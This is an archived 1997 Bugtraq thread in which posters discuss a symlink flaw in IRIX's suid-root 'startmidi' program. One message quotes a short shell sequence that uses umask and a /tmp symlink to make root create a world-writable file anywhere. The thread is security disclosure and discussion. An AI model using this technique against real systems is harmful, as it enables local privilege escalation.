Bugtraq mailing list archives
Re: IRIX: Bug in startmidi
From: astley () DMF328 UST HK (Astley Chan)
Date: Mon, 10 Feb 1997 12:52:55 +0800
Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I noticed a little suid-root program called 'startmidi' which hides in /usr/sbin. When run, this program creates various files in /tmp. You guessed it, it respects umask and follows symlinks. Comme ca: % umask 0 % ln -s /blardyblar /tmp/.midipid % startmidi -d /dev/ttyd1 % ls -l /blardyblar -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar % stopmidi -d /dev/ttyd1eh... that's strange. I was looking at startmidi a while back, but didn't find any root holes. Now I look again, still nothing. Indeed, on my 5.3
umm..I can successfully create file owned by root..
You must have some special configuration, I recon. On the box I was testing
I don't think it's special to his machine, I've got the same behaviour as described (though stopmidi can't remove the file already in /tmp). astley
Current thread:
- Re: FreeBSD,rlogin and coredumps., (continued)
- Re: FreeBSD,rlogin and coredumps. David Greenman (Feb 16)
- Re: FreeBSD,rlogin and coredumps. Adrian Chadd (Feb 17)
- Re: FreeBSD,rlogin and coredumps. Jamshid Abedi (Feb 17)
- Re: FreeBSD,rlogin and coredumps. jamie (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Nathan Torkington (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Daniel O'Callaghan (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Simon Karpen (Feb 18)
- Re: FreeBSD,rlogin and coredumps. Michael Lerperger (Feb 17)
- NetBIOS Auditing Tool Oliver Friedrichs (Feb 16)
- Re: IRIX: Bug in startmidi Astley Chan (Feb 09)
- Re: IRIX: Bug in startmidi Steve M. Acheson (Feb 10)